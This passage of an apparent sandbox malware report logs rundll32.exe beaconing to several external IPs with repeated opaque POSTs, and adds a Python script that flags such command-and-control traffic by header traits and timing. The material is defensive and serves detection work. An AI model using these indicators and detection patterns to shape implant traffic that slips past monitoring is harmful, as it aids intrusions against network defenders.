Oct 28, 2021 04:57:58.848484993 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:58.848769903 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:58.848855972 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:58.852910995 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:58.852999926 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:58.853028059 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:59.560364962 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:59.560451031 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:59.560545921 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:59.560569048 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:59.572635889 CEST | 49747 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:57:59.572674990 CEST | 443 | 49747 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:57:59.728296041 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:57:59.888998032 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:57:59.889239073 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:57:59.890458107 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.048832893 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:00.050988913 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:00.051131010 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.411868095 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.569957018 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:00.570770979 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:00.570889950 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.572593927 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.572730064 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:00.730981112 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:00.731003046 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:01.045767069 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.045819044 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.046087027 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.068650961 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.068682909 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.118796110 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:01.118822098 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:01.118881941 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:01.118933916 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:01.126609087 CEST | 49748 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:01.253654957 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.284967899 CEST | 808 | 49748 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:01.420034885 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:01.422132969 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.422914028 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.589122057 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:01.590126991 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:01.590590954 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.596137047 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.596292019 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.598588943 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.765196085 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:01.765328884 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.766067028 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.766206980 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:01.854011059 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.854048014 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.854454994 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.854542971 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.859524012 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.859631062 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:01.859678030 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:01.932539940 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:01.932564974 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:02.314405918 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:02.314426899 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:02.314666986 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:02.352703094 CEST | 49750 | 6891 | 192.168.2.6 | 45.77.0.96
Oct 28, 2021 04:58:02.519212961 CEST | 6891 | 49750 | 45.77.0.96 | 192.168.2.6
Oct 28, 2021 04:58:02.570838928 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:02.570916891 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:02.570919991 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:02.570987940 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:02.574436903 CEST | 49749 | 443 | 192.168.2.6 | 192.46.210.220
Oct 28, 2021 04:58:02.574465990 CEST | 443 | 49749 | 192.46.210.220 | 192.168.2.6
Oct 28, 2021 04:58:02.766282082 CEST | 49756 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:02.767570972 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.827249050 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:02.827380896 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.828815937 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.888236046 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:02.901067972 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:02.901098013 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:02.901236057 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.910237074 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.927395105 CEST | 808 | 49756 | 143.244.140.214 | 192.168.2.6
Oct 28, 2021 04:58:02.927536964 CEST | 49756 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:02.928477049 CEST | 49756 | 808 | 192.168.2.6 | 143.244.140.214
Oct 28, 2021 04:58:02.970412970 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:02.970511913 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.995630026 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:02.995762110 CEST | 49755 | 8116 | 192.168.2.6 | 185.56.219.47
Oct 28, 2021 04:58:03.055043936 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:03.055646896 CEST | 8116 | 49755 | 185.56.219.47 | 192.168.2.6
Oct 28, 2021 04:58:03.089015961 CEST | 808 | 49756 | 143.244.140.214 | 192.168.2.6

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 28, 2021 05:01:42.914350033 CEST | 8.8.8.8 | 192.168.2.6 | 0x739b | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

• 192.46.210.220

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49747 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:57:58 UTC | 0 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4862
Connection: Close
Cache-Control: no-cache
2021-10-28 02:57:59 UTC | 4 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:57:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49749 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:01 UTC | 4 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4850
Connection: Close
Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:02 UTC9INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close
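
Every session in this part of the report has the same shape: a POST to "/" with a bare-IP Host header, no User-Agent and no Content-Type, "Connection: Close" plus "Cache-Control: no-cache", a body of roughly 4.8 kB, and a 403 from nginx a second later, repeated every few seconds from rundll32.exe. The Python script below is an added example, not tooling from the Joe Sandbox report: it scores a captured request head for exactly those traits and computes the inter-arrival statistics of the connections to 192.46.210.220:443. The SESSIONS list is constructed from the session tables in this excerpt (sessions 1, 2 and 10 through 20; the 16-second gap after session 2 only reflects that the intervening sessions are not shown here, and session 20's response is cut off). The 60-second window and 5-connection threshold are illustrative assumptions, not values taken from the report.

```python
"""Triage of the repeated POST sessions to 192.46.210.220:443 (added example)."""
from datetime import datetime
from ipaddress import ip_address
from statistics import median
from typing import NamedTuple, Optional


class Session(NamedTuple):
    sid: int                # Session ID column of the report
    src_port: int           # Source Port column
    ts: str                 # Timestamp column, UTC
    content_length: int     # Content-Length of the POST
    status: Optional[str]   # first line of the response, None if not captured


# Constructed from the session tables in this excerpt (sessions 1, 2, 10-20).
SESSIONS = [
    Session(1,  49749, "2021-10-28 02:58:01", 4850, "HTTP/1.1 403 Forbidden"),
    Session(2,  49758, "2021-10-28 02:58:04", 4862, "HTTP/1.1 403 Forbidden"),
    Session(10, 49796, "2021-10-28 02:58:20", 4862, "HTTP/1.1 403 Forbidden"),
    Session(11, 49801, "2021-10-28 02:58:23", 4850, "HTTP/1.1 403 Forbidden"),
    Session(12, 49803, "2021-10-28 02:58:25", 4862, "HTTP/1.1 403 Forbidden"),
    Session(13, 49809, "2021-10-28 02:58:27", 4850, "HTTP/1.1 403 Forbidden"),
    Session(14, 49811, "2021-10-28 02:58:28", 4862, "HTTP/1.1 403 Forbidden"),
    Session(15, 49817, "2021-10-28 02:58:31", 4850, "HTTP/1.1 403 Forbidden"),
    Session(16, 49819, "2021-10-28 02:58:32", 4862, "HTTP/1.1 403 Forbidden"),
    Session(17, 49825, "2021-10-28 02:58:35", 4850, "HTTP/1.1 403 Forbidden"),
    Session(18, 49827, "2021-10-28 02:58:36", 4862, "HTTP/1.1 403 Forbidden"),
    Session(19, 49833, "2021-10-28 02:58:39", 4850, "HTTP/1.1 403 Forbidden"),
    Session(20, 49836, "2021-10-28 02:58:40", 4862, None),  # response not in excerpt
]

# Request head exactly as captured; only Content-Length changes between sessions.
REQUEST_HEAD = (
    "POST / HTTP/1.1\r\nHost: 192.46.210.220\r\nContent-Length: {n}\r\n"
    "Connection: Close\r\nCache-Control: no-cache\r\n\r\n"
)


def parse_request_head(raw: str):
    """Return (method, path, headers) from an HTTP/1.x request head."""
    request_line, _, rest = raw.partition("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:            # empty line terminates the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def request_indicators(raw: str) -> set:
    """Traits of the captured beacon that are cheap to check on proxy or IDS logs."""
    method, path, h = parse_request_head(raw)
    hits = set()
    if method == "POST" and path == "/":
        hits.add("post_to_root")
    try:                        # Host is a literal IP, not a hostname
        ip_address(h.get("host", "").split(":")[0])
        hits.add("host_is_bare_ip")
    except ValueError:
        pass
    if "user-agent" not in h:
        hits.add("no_user_agent")
    if "content-type" not in h and int(h.get("content-length", "0")) > 4000:
        hits.add("large_untyped_body")
    if h.get("connection", "").lower() == "close" and h.get("cache-control") == "no-cache":
        hits.add("close_nocache_pair")
    return hits


def beacon_summary(sessions, window_s: int = 60, min_connections: int = 5) -> dict:
    """Inter-arrival statistics for connections that share one destination."""
    times = sorted(datetime.strptime(s.ts, "%Y-%m-%d %H:%M:%S") for s in sessions)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    span = (times[-1] - times[0]).total_seconds()
    answered = [s for s in sessions if s.status]
    return {
        "connections": len(times),
        "span_s": span,
        "median_gap_s": median(gaps),
        "max_gap_s": max(gaps),
        "content_lengths": sorted({s.content_length for s in sessions}),
        "all_403": all(s.status.split()[1] == "403" for s in answered),
        # assumption: many short-lived connections to one host in one window
        "beaconing": len(times) >= min_connections and span <= window_s,
    }


if __name__ == "__main__":
    print(sorted(request_indicators(REQUEST_HEAD.format(n=4850))))
    print(beacon_summary(SESSIONS))
```

The header traits alone are weak (plenty of broken clients omit a User-Agent), so the script only reports them; the combination with a tight, same-destination retry pattern and a server that answers every request with 403 is what makes this worth an alert. Note that the traffic is on port 443 and the sandbox shows it decrypted; on a production network the header checks apply only where TLS is terminated, while the connection-timing part works on flow logs.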


Session ID: 10 | Source IP: 192.168.2.6 | Source Port: 49796 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:20 UTC | 49 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:20 UTC | 49 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:21 UTC | 54 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:21 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 49801 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:23 UTC | 54 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:23 UTC | 54 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:23 UTC | 59 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:23 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 49803 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:25 UTC | 59 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:25 UTC | 59 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:25 UTC | 64 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:25 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 49809 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:27 UTC | 64 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:27 UTC | 64 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:28 UTC | 69 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:28 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 49811 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:28 UTC | 69 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:28 UTC | 69 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:29 UTC | 74 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:29 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 49817 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:31 UTC | 74 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:31 UTC | 74 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:32 UTC | 79 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:32 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 49819 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:32 UTC | 79 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
